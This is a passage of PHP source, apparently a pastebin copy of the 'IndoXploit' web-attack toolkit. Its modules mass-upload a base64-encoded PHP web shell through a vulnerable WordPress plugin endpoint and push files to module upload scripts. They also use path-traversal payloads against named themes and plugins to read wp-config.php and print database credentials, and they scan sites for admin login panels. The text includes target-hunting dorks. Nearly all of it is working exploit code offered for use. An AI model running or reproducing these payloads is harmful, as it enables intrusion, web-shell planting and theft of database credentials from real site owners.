  767. Target: <br><br><textarea name="url" placeholder="http://www.target.com/" style='width: 350px; height:50px;' class='checkout-input'></textarea><br><br>
  768. <input type='submit' name='exp' value='Upload' class='button'>
  769. </form>
  770. <?php
  771. // IndoXploit
  772. set_time_limit(0);
  773. error_reporting(0);
  774.  
  775. function buffer() {
  776. ob_flush();
  777. flush();
  778. }
  779. function curl($url, $payload) {
  780. $ch = curl_init();
  781. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  782. curl_setopt($ch, CURLOPT_URL, $url);
  783. curl_setopt($ch, CURLOPT_POST, true);
  784. curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
  785. curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookie.txt');
  786. curl_setopt($ch, CURLOPT_COOKIEFILE, 'cookie.txt');
  787. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  788. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  789. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
  790. curl_setopt($ch, CURLOPT_HEADER, 0);
  791. curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
  792. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  793. $res = curl_exec($ch);
  794. curl_close($ch);
  795. return $res;
  796. }
  797. $file = htmlspecialchars($_POST['filename']);
  798. $site = explode("\r\n", $_POST['url']);
  799. $do = $_POST['exp'];
  800. $uploader = base64_decode("PD9waHANCmVjaG8gIjxicj4iLnBocF91bmFtZSgpLiI8YnI+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQo8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4Jz48aW5wdXQgdHlwZT0nc3VibWl0JyBuYW1lPSd1cGxvYWQnIHZhbHVlPSd1cGxvYWQnPg0KPC9mb3JtPiI7DQppZigkX1BPU1RbJ3VwbG9hZCddKSB7DQoJaWYoQGNvcHkoJF9GSUxFU1snaWR4J11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2lkeCddWyduYW1lJ10pKSB7DQoJZWNobyAic3Vrc2VzIjsNCgl9IGVsc2Ugew0KCWVjaG8gImdhZ2FsIjsNCgl9DQp9DQo/Pg==");
  801. if($do) {
  802. $y = date("Y");
  803. $m = date("m");
  804. $idx_dir = mkdir("Mk_only", 0755);
  805. $shell = "Mk_only/".$file;
  806. $fopen = fopen($shell, "w");
  807. fwrite($fopen, $uploader);
  808. fclose($fopen);
  809. foreach($site as $url) {
  810. $target = $url.'/wp-content/plugins/Tevolution/tmplconnector/monetize/templatic-custom_fields/uploadfile.php';
  811. $cek_shell = "$url/wp-content/uploads/$y/$m/$file";
  812. $data = array(
  813. "Filedata" => "@$shell"
  814. );
  815. $curl = curl($target, $data);
  816. if($curl) {
  817. $cek = file_get_contents($cek_shell);
  818. if(preg_match("/Auto Xploiter/is", $cek)) {
  819. echo "<a href='$cek_shell' target='_blank'>$cek_shell</a> -> shellmu<br>";
  820. }
  821. }
  822. buffer();
  823. }
  824. }
  825. exit;
  826. }
  827. ?>
  828. <?php
  829. if ($_GET['uploadimages'] == 'Done!') {
  830. @session_start();
  831. @error_reporting(0);
  832. @ini_set('error_log',NULL);
  833. @ini_set('log_errors',0);
  834. @ini_set('display_errors', 0);
  835. @set_time_limit(0);
  836.  
  837. echo"<br><center><a Style='font-size:30px;color:#ededed;'> Modules Upload Files (uploadimages)</a></center><center>
  838. <br>
  839. /uploadimages.php<br>
  840. Dork : /modules/simpleslideshow/<br>
  841. Dork : /modules/productpageadverts/<br>
  842. Dork : /modules/homepageadvertise/<br>
  843. Dork : /modules/columnadverts/<br>
  844.  
  845. <form method='post' class='header-izz'>
  846. Domain: <br><br>
  847. <textarea placeholder='http://www.target.com/' name='url' style='width: 350px; height:50px;' class='checkout-input'></textarea><br><br>
  848. <input type='submit' name='MK' value='Done!' class='button'>
  849. </form><br>";
  850. if($_POST['MK']) {
  851. $site = $_POST['url'];
  852. $file = "mk.html";
  853. echo "<br>Target : ".$site."<br>";
  854. $expl = array("/modules/simpleslideshow/","/modules/productpageadverts/","/modules/homepageadvertise/","/modules/columnadverts/","/modules/vtemslideshow/");
  855. foreach($expl as $exploit){
  856. $post = array("userfile" => "@$file",
  857. );
  858. $MK = $site.$exploit."/uploadimages.php";
  859. $ch2 = curl_init ($MK);
  860. curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
  861. curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
  862. curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
  863. curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
  864. curl_setopt ($ch2, CURLOPT_POST, 1);
  865. curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
  866. $data = curl_exec ($ch2);
  867. $Gets = $site.$exploit."/file_uploads/".$file;
  868. $MKget = @file_get_contents($Gets);
  869. if(preg_match('#MK#i',$MKget)){
  870. echo "<br> [#]Exploit Success :) <br>[#] ".$Gets."<br><hr><br>";
  871. }else{
  872. echo "<br>";}
  873. } }
  874. exit;
  875. }
  876. ?>
  877. <?php
  878. if ($_GET['Upload'] == 'Done!') {
  879. ?>
  880. <br><center><a Style='font-size:30px;color:#ededed;'>Exploit Upload Files (Functionns)</a></center><center>
  881. <br>
  882. <form method="post" class='header-izz'>
  883. Your Target : <br><br><input type="text" name="sites" size="10" value="http://target.mu/plugin/upload.php" class='checkout-input'><br>
  884. <br>Default Shell is Auto Created :<br><br> <input type="text" name="file" size="10" value="mk.php.xxxjpg" class='checkout-input'><br><br>
  885. <input name="conf" value="EXECUTE" type="submit" class='button'><br><br></form>
  886. </center>
  887. <?php
  888. $e=explode("\n",$_POST['sites']);
  889. $file = $_POST['file'];
  890. foreach($e as $sites){
  891. $post = array("files[]" => "@$file",
  892. );
  893. $ch2 = curl_init ($sites);
  894. curl_setopt ($ch2, CURLOPT_RETURNTRANSFER, 1);
  895. curl_setopt ($ch2, CURLOPT_FOLLOWLOCATION, 1);
  896. curl_setopt ($ch2, CURLOPT_SSL_VERIFYPEER, 0);
  897. curl_setopt ($ch2, CURLOPT_SSL_VERIFYHOST, 0);
  898. curl_setopt ($ch2, CURLOPT_POST, 1);
  899. curl_setopt ($ch2, CURLOPT_POSTFIELDS, $post);
  900. $data = curl_exec ($ch2);
  901. echo $data."\n\n\n";
  902. }
  903. exit;
  904. }
  905. ?>
  906. <?php
  907. if ($_GET['download'] == 'Done!') {
  908. ?>
  909. <br><center><a Style='font-size:30px;color:#ededed;'>Wordpress Auto Get Database (LFI)</a></center><center>
  910. <br>
  911. Dork : /download.php<br>
  912. Dork : /force-download.php?file=<br>
  913. Dork : /wp-download.php?download=<br>
  914. Dork : /download.php?download=<br>
  915. <form method='post' class='header-izz'>
  916. Domain: <br><br>
  917. <textarea placeholder='http://www.target.com/' name='sites' cols='45' rows='15' style='width: 350px; height:50px;' class='checkout-input'></textarea><br>
  918. <br><input value="EXECUTE" type="submit" class='button'><br><br>
  919. </form>
  920. <?php
  921. @set_time_limit(0);
  922. $sites = explode("\r\n", $_POST['sites']);
  923. foreach($sites as $site) {
  924. $site = trim($site);
  925.  
  926. $ch = curl_init();
  927. curl_setopt($ch, CURLOPT_URL, "$site");
  928. curl_setopt($ch, CURLOPT_HEADER, 1);
  929. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  930. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  931. $get = curl_exec($ch);
  932. curl_close($ch);
  933. if(preg_match("#WordPress (.*?)/>#", $get, $version)){
  934. $str = str_replace('/>', "", $version[0]);
  935. $str = str_replace('"', "", $str);
  936.  
  937. $users = @file_get_contents("$site/?author=1");
  938. preg_match('/<title>(.*?)<\/title>/si',$users,$user);
  939. $wpuser = explode('|',$user[1]);
  940.  
  941. echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version : ".$str."<br>"; }
  942. $expl = array("wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php","wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php","wp-content/themes/urbancity/lib/scripts/download.php?file=wp-config.php","wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php","wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php","wp-content/force-download.php?file=../wp-config.php","wp-content/themes/lote27/download.php?download=../../../wp-config.php","wp-content/plugins/wp-custom-pages/wp-download.php?download=../../../wp-config.php");
  943. foreach($expl as $exploit){
  944. $ch = curl_init();
  945. curl_setopt($ch, CURLOPT_URL, "$site/$exploit");
  946. curl_setopt($ch, CURLOPT_HTTPGET, 1);
  947. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  948. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  949. $xp = curl_exec ($ch);
  950. curl_close($ch);
  951. if(preg_match("#DB_USER#i",$xp)){
  952. preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
  953. echo "DB_NAME:{$DB_NAME[1]}<br>";
  954. preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
  955. echo "DB_USER:{$DB_USER[1]}<br>";
  956. preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
  957. echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
  958. preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
  959. echo "DB_HOST:{$DB_HOST[1]}<br>";
  960. }
  961. }
  962. $lt = array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php","wp-content/themes/dejavu/lib/scripts/dl-skin.php");
  963. foreach($lt as $l){
  964. $site = "$site/$l";
  965. $process = curl_init($site);
  966. curl_setopt($process, CURLOPT_TIMEOUT, 30);
  967. curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)");
  968. curl_setopt($process, CURLOPT_HEADER, TRUE);
  969. curl_setopt($process, CURLOPT_POST, 1);
  970. curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php");
  971. curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
  972. curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
  973. $return = curl_exec($process);
  974. if(preg_match("#DB_USER#i",$return)){
  975. preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
  976. echo "DB_NAME:{$DB_NAME[1]}<br>";
  977. preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
  978. echo "DB_USER:{$DB_USER[1]}<br>";
  979. preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
  980. echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
  981. preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
  982. echo "DB_HOST:{$DB_HOST[1]}<br>";
  983. break;
  984. }
  985. }
  986. }
  987. exit;
  988. }
  989. ?>
  990. <?
  991. if ($_GET['mail-masta'] == 'Done!') {
  992. @session_start();
  993. @error_reporting(0);
  994. @ini_set('error_log',NULL);
  995. @ini_set('log_errors',0);
  996. @ini_set('display_errors', 0);
  997. @set_time_limit(0);
  998.  
  999. echo"<br><center><a Style='font-size:30px;color:#ededed;'>Wordpress Auto Get DataBase (AFD)</a></center><center>
  1000. <br>
  1001. Dork : /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php <br>
  1002. Dork : /wp-content/plugins/mail-masta/inc/campaign/ <br>
  1003. <form method='post' class='header-izz'>
  1004. Domain: <br><br>
  1005. <textarea placeholder='http://www.target.com/' name='url' style='width: 350px; height:50px;' class='checkout-input'></textarea><br><br>
  1006. <input type='submit' name='MK' value='GET DB!' class='button'>
  1007. </form>";
  1008. $site = $_POST['url'];
  1009. if($_POST['MK']) {
  1010. echo "<br><b style='color:#ededed;'>TARGET : </b>".$site."<br><br>";
  1011. echo "<br><b style='color:#ededed;'>SCAN FINISH : </b><br>";
  1012. $expl = array("/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=../wp-config.php","/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=../../wp-config.php","/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=../../../wp-config.php","/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=../../../../wp-config.php","/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=../../../../../wp-config.php");
  1013. foreach($expl as $exploit){
  1014. $ch = curl_init();
  1015. curl_setopt($ch, CURLOPT_URL, "$site/$exploit");
  1016. curl_setopt($ch, CURLOPT_HTTPGET, 1);
  1017. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  1018. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  1019. $xp = curl_exec ($ch);
  1020. curl_close($ch);
  1021. if(preg_match("#DB_USER#i",$xp)){
  1022. preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
  1023. echo "DB_NAME:{$DB_NAME[1]}<br>";
  1024. preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
  1025. echo "DB_USER:{$DB_USER[1]}<br>";
  1026. preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
  1027. echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
  1028. preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
  1029. echo "DB_HOST:{$DB_HOST[1]}<br>";
  1030. }
  1031. }
  1032. }
  1033. exit;
  1034. }
  1035.  
  1036. /////
  1037. if ($_GET['forcedownload'] == 'Done!') {
  1038. @session_start();
  1039. @error_reporting(0);
  1040. @ini_set('error_log',NULL);
  1041. @ini_set('log_errors',0);
  1042. @ini_set('display_errors', 0);
  1043. @set_time_limit(0);
  1044.  
  1045. echo"<br><center><a Style='font-size:30px;color:#ededed;'>WordPress Get Database | RB-Agency </a></center><center>
  1046. <br>
  1047. Dork : /wp-content/plugins/rb-agency/ext/forcedownload.php?file=<br>
  1048. Dork : /forcedownload.php?file=<br>
  1049. <form method='post' class='header-izz'>
  1050. Domain: <br><br>
  1051. <textarea placeholder='http://www.target.com/' name='url' style='width: 350px; height:50px;' class='checkout-input'></textarea><br><br>
  1052. <input type='submit' name='MK' value='GET DB!' class='button'>
  1053. </form>";
  1054. $site = $_POST['url'];
  1055. if($_POST['MK']) {
  1056. echo "<br><b style='color:#ededed;'>TARGET : </b>".$site."<br><br>";
  1057. echo "<br><b style='color:#ededed;'>SCAN FINISH : </b><br>";
  1058. $expl = array("/wp-content/plugins/rb-agency/ext/
  1059. forcedownload.php?file=../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../../../../wp-config.php","/wp-content/plugins/rb-agency/ext/forcedownload.php?file=../../../../../../../wp-config.php");
  1060. foreach($expl as $exploit){
  1061. $ch = curl_init();
  1062. curl_setopt($ch, CURLOPT_URL, "$site/$exploit");
  1063. curl_setopt($ch, CURLOPT_HTTPGET, 1);
  1064. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  1065. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  1066. $xp = curl_exec ($ch);
  1067. curl_close($ch);
  1068. if(preg_match("#DB_USER#i",$xp)){
  1069. preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
  1070. echo "<b style='color:black;'>DB_NAME: </b>{$DB_NAME[1]}<br>";
  1071. preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
  1072. echo "<b style='color:black;'> DB_USER: </b>{$DB_USER[1]}<br>";
  1073. preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
  1074. echo "<b style='color:black;'> DB_PASSWORD: </b>{$DB_PASSWORD[1]}<br>";
  1075. preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
  1076. echo "<b style='color:black;'> DB_HOST: </b>{$DB_HOST[1]}<br>";
  1077. }
  1078. }
  1079. }
  1080. }
  1081. ?>
  1082. <?
  1083. if ($_GET['Finder'] == 'Done!') {
  1084. ?>
  1085. <center>
  1086. <br><center><a Style="font-size:30px;color:#ededed;">Finder Admins Havij 1.152 Pro </a></center>
  1087. <center><br> Finder Admins Havij 1.152 Pro v2.1
  1088. <br> Coded By Mister Klio
  1089. <center><form action ="" method="post" class="header-izz">
  1090. <center>Paste your target :</center><br><br>
  1091. <center><input type="text" name="site" alt="username" value="<?php echo "".$_SERVER['HTTP_HOST']."";?>" class="checkout-input"></center><br>
  1092. <center><input type = "submit" value="FIND" class="button"></center>
  1093. <?php
  1094. $site = $_POST['site'];
  1095. $list = array(
  1096. '/phpmyadmin/','/upload.php/','/admin.%EXT%/','/login.htm/','/login.html/','/login/','/login.%EXT%/','/adm/','/admin/','/admin/account.html/','/admin/login.html/','/admin/login.htm/','/admin/home.%EXT%/','/admin/controlpanel.html/','/admin/controlpanel.htm/','/admin/cp.%EXT%/','/admin/adminLogin.html/','/admin/adminLogin.htm/','/admin/admin_login.%EXT%/','/admin/controlpanel.%EXT%/','/admin/admin-login.%EXT%/','/admin-login.%EXT%/','/admin/account.%EXT%/','/admin/admin.%EXT%/','/admin.htm/','/admin.html/','/adminitem/','/adminitem.%EXT%/','/adminitems/','/adminitems.%EXT%/','/administrator/','/administrator/login.%EXT%/','/administrator.%EXT%/','/administration/','/administration.%EXT%/','/adminLogin/','/adminlogin.%EXT%/','/admin_area/admin.%EXT%/','/admin_area/','/admin_area/login.%EXT%/','/manager/','/manager.%EXT%/','/letmein/','/letmein.%EXT%/','/superuser/','/superuser.%EXT%/','/access/','/access.%EXT%/','/sysadm/','/sysadm.%EXT%/','/superman/','/supervisor/','/panel.%EXT%/','/control/','/control.%EXT%/','/member/','/member.%EXT%/','/members/','/members.%EXT%/','/user/','/user.%EXT%/','/cp/','/uvpanel/','/manage/','/manage.%EXT%/','/management/','/management.%EXT%/','/signin/','/signin.%EXT%/','/log-in/','/log-in.%EXT%/','/log_in/','/log_in.%EXT%/','/sign_in/','/sign_in.%EXT%/','/sign-in/','/sign-in.%EXT%/','/users/','/users.%EXT%/','/accounts/','/accounts.%EXT%/','/wp-login.php/','/bb-admin/login.%EXT%/','/bb-admin/admin.%EXT%/','/bb-admin/admin.html/','/administrator/account.%EXT%/','/relogin.htm/','/relogin.html/','/check.%EXT%/','/relogin.%EXT%/','/blog/wp-login.%EXT%/','/user/admin.%EXT%/','/users/admin.%EXT%/','/registration/','/processlogin.%EXT%/','/checklogin.%EXT%/','/checkuser.%EXT%/','/checkadmin.%EXT%/','/isadmin.%EXT%/','/authenticate.%EXT%/','/authentication.%EXT%/','/auth.%EXT%/','/authuser.%EXT%/','/authadmin.%EXT%/','/cp.%EXT%/','/modelsearch/login.%EXT%/','/moderator.%EXT%/','/moderator/','/controlpanel/','/controlpanel.%EXT%/','/admincontrol.%EXT%/','/adminpanel.%EXT%/','/fileadmin/','/fileadmin.%EXT%/','/sysadmin.%EXT%/','/admin1.%EXT%/','/admin1.html/','/admin1.htm/','/admin2.%EXT%/','/admin2.html/','/yonetim.%EXT%/','/yonetim.html/','/yonetici.%EXT%/','/yonetici.html/','/phpmyadmin/','/myadmin/','/ur-admin.%EXT%/','/ur-admin/','/Server.%EXT%/','/Server/','/wp-admin/','/administr8.%EXT%/','/administr8/','/webadmin/','/webadmin.%EXT%/','/administratie/','/admins/','/admins.%EXT%/','/administrivia/','/Database_Administration/','/useradmin/','/sysadmins/','/admin1/','/system-administration/','/administrators/','/pgadmin/','/directadmin/','/staradmin/','/ServerAdministrator/','/SysAdmin/','/administer/','/LiveUser_Admin/','/sys-admin/','/typo3/','/panel/','/cpanel/','/cpanel_file/','/platz_login/','/rcLogin/','/blogindex/','/formslogin/','/autologin/','/support_login/','/meta_login/','/manuallogin/','/simpleLogin/','/loginflat/','/utility_login/','/showlogin/','/memlogin/','/login-redirect/','/sub-login/','/wp-login/','/login1/','/dir-login/','/login_db/','/xlogin/','/smblogin/','/customer_login/','/UserLogin/','/login-us/','/acct_login/','/bigadmin/','/project-admins/','/phppgadmin/','/pureadmin/','/sql-admin/','/radmind/','/openvpnadmin/','/wizmysqladmin/','/vadmind/','/ezsqliteadmin/','/hpwebjetadmin/','/newsadmin/','/adminpro/','/Lotus_Domino_Admin/','/bbadmin/','/vmailadmin/','/Indy_admin/','/ccp14admin/','/irc-macadmin/','/banneradmin/','/sshadmin/','/phpldapadmin/','/macadmin/','/administratoraccounts/','/admin4_account/','/admin4_colon/','/radmind-1/','/Super-Admin/','/AdminTools/','/cmsadmin/','/SysAdmin2/','/globes_admin/','/cadmins/','/phpSQLiteAdmin/','/navSiteAdmin/','/server_admin_small/','/logo_sysadmin/','/power_user/','/system_administration/','/ss_vms_admin_sm/','/bb-admin/','/panel-administracion/','/instadmin/','/memberadmin/','/administratorlogin/','/adm.%EXT%/','/admin_login.%EXT%/','/panel-administracion/login.%EXT%/','/pages/admin/admin-login.%EXT%/','/pages/admin/','/acceso.%EXT%/','/admincp/login.%EXT%/','/admincp/','/adminarea/','/admincontrol/','/affiliate.%EXT%/','/adm_auth.%EXT%/','/memberadmin.%EXT%/','/administratorlogin.%EXT%/','/modules/admin/','/administrators.%EXT%/','/siteadmin/','/siteadmin.%EXT%/','/adminsite/','/kpanel/','/vorod/','/vorod.%EXT%/','/vorud/','/vorud.%EXT%/','/adminpanel/','/PSUser/','/secure/','/webmaster/','/webmaster.%EXT%/','/autologin.%EXT%/','/userlogin.%EXT%/','/admin_area.%EXT%/','/cmsadmin.%EXT%/','/security/','/usr/','/root/','/secret/','/admin/login.%EXT%/','/admin/adminLogin.%EXT%/','/moderator.php/','/moderator.html/','/moderator/login.%EXT%/','/moderator/admin.%EXT%/','/yonetici.%EXT%/','/0admin/','/0manager/','/aadmin/','/cgi-bin/login%EXT%/','/login1%EXT%/','/login_admin/','/login_admin%EXT%/','/login_out/','/login_out%EXT%/','/login_user%EXT%/','/loginerror/','/loginok/','/loginsave/','/loginsuper/','/loginsuper%EXT%/','/login%EXT%/','/logout/','/logout%EXT%/','/secrets/','/super1/','/super1%EXT%/','/super_index%EXT%/','/super_login%EXT%/','/supermanager%EXT%/','/superman%EXT%/','/superuser%EXT%/','/supervise/','/supervise/Login%EXT%/','/super%EXT%/',
  1097. );
  1098. if(isset($site)){
  1099. foreach($list as $path => $test) {
  1100. $ch = curl_init();
  1101. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1102. curl_setopt($ch, CURLOPT_HEADER, 1);
  1103. curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36");
  1104. curl_setopt($ch, CURLOPT_URL, $site.$test);
  1105. $result = curl_exec($ch);
  1106. curl_close($ch);
  1107. //print $url;
  1108. if (preg_match("/200 OK/", $result)){
  1109. echo "<br><span style='color:#0078FF;'><b> Done ! </b></span><br><textarea class='checkout-input'>$site$test</textarea> ";
  1110. } else
  1111. if (preg_match("/401 Unauthorized/", $result)) {
  1112. echo "<br><span style='color:#0078FF;'><b>Done ! </b></span><br><textarea class='checkout-input'>$site$test</textarea> ";
  1113. }
  1114. }
  1115. echo "<br><br><span style='color:red;'>SCAN FINISHED </span><br><br></form>";
  1116. exit;
  1117. }
  1118. }
  1119. exit;
  1120. ?>
  1121.  
  1122. </body>
  1123. </html>
Add Comment
Please, Sign In to add comment